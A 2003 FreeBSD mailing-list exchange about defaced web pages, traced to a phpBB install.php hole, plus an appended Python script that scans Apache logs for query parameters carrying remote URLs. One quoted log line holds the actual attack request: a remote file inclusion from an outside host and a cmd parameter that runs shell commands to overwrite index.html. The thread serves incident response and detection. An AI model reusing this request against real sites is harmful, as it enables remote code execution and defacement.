From owner-freebsd-stable@FreeBSD.ORG Fri Nov 7 04:28:53 2003
Date: Fri, 7 Nov 2003 13:30:50 +0100 (CET)
From: Miha Nedok
To: Marco Trentini
cc: stable@freebsd.org
cc: security@freebsd.org
Subject: Re: hack ? - urgent - false FreeBSD alarm
Message-ID: <20031107132650.H19165@voyager.zrcalo.si>
In-Reply-To: <3FAB8B3A.7020908@remotelab.org>
References: <20031107125529.R19165@voyager.zrcalo.si> <3FAB8B3A.7020908@remotelab.org>

Hi !

It is phpBB related.
I found in logs:

200.211.35.130 - - [07/Nov/2003:11:27:01 +0100] "GET /forum/install.php?phpbb_root_dir=http://www.creatividade.hpg.com.br/&cmd=cd%20..;cd%20..;cd%20www.site-name.si;echo%20IR4DEX%20ownz%20you%20FreeBSD%20-%20contato:%20ir4dex@hotmail.com%20>%20index.html HTTP/1.1" 200 904 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"

I just did chmod 000 `find -name 'install.php'` for a workaround.

Apache is latest: Nov 3 18:08 apache+mod_ssl-1.3.28+2.8.15_2 .

-Miha

On Fri, 7 Nov 2003, Marco Trentini wrote:

> Date: Fri, 07 Nov 2003 13:08:26 +0100
> From: Marco Trentini
> To: Miha Nedok
> Cc: security@freebsd.org, stable@freebsd.org
> Subject: Re: hack ? - urgent
>
> Miha Nedok wrote:
> > Hi !
> >
> > Today I have noticed some modified index.html files on some of our vhosts.
> > Is it Apache related ? Does anyone know about this ?
> >
> > The content is the following:
> > IR4DEX ownz you FreeBSD - contato: ir4dex@hotmail.com
>
> Is your apache version up to date?
>
> Maybe IR4DEX knows more about it :)
>
> --
> Marco Trentini mark@remotelab.org
> http://www.remotelab.org/
>
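
Added example (not part of the original message or thread): a Python check for the pattern in the log line above, flagging any request whose query string carries a parameter value that is itself a remote URL, as phpbb_root_dir is there. The sample lines are constructed (documentation addresses and the placeholder host remote.example) and the function names are hypothetical; values are percent-decoded before testing, so an encoded URL is caught as well.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache common/combined log line: capture client, request target, status code.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) ')
REMOTE_URL = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample lines modelled on the request quoted in the message.
SAMPLE = [
    '203.0.113.7 - - [07/Nov/2003:11:27:01 +0100] "GET /forum/install.php'
    '?phpbb_root_dir=http://remote.example/&cmd=echo%20test HTTP/1.1" 200 904 "-" "Mozilla/4.0"',
    '203.0.113.7 - - [07/Nov/2003:11:27:09 +0100] "GET /shop/install.php'
    '?phpbb_root_dir=http%3A%2F%2Fremote.example%2F HTTP/1.1" 404 210 "-" "Mozilla/4.0"',
    '198.51.100.20 - - [07/Nov/2003:11:28:15 +0100] "GET /forum/viewtopic.php'
    '?t=42 HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
]

def remote_include_hits(lines):
    """Return (client, path, parameter, status) for every request in which a
    query parameter's decoded value starts with http://, https:// or ftp://."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue  # not an access-log line in the expected format
        client, target, status = m.groups()
        parts = urlsplit(target)
        # parse_qsl percent-decodes names and values before they are tested
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if REMOTE_URL.match(value):
                hits.append((client, parts.path, name, int(status)))
    return hits

def served(hits):
    """Hits answered with a 2xx status: the script was reachable, so those
    vhosts are the ones to inspect first for modified files."""
    return [h for h in hits if 200 <= h[3] < 300]

if __name__ == "__main__":
    for hit in remote_include_hits(SAMPLE):
        print(*hit)
```

Parameters that legitimately carry URLs (redirect or return-to targets) will also match, so treat a hit as a lead to review, not as proof of compromise.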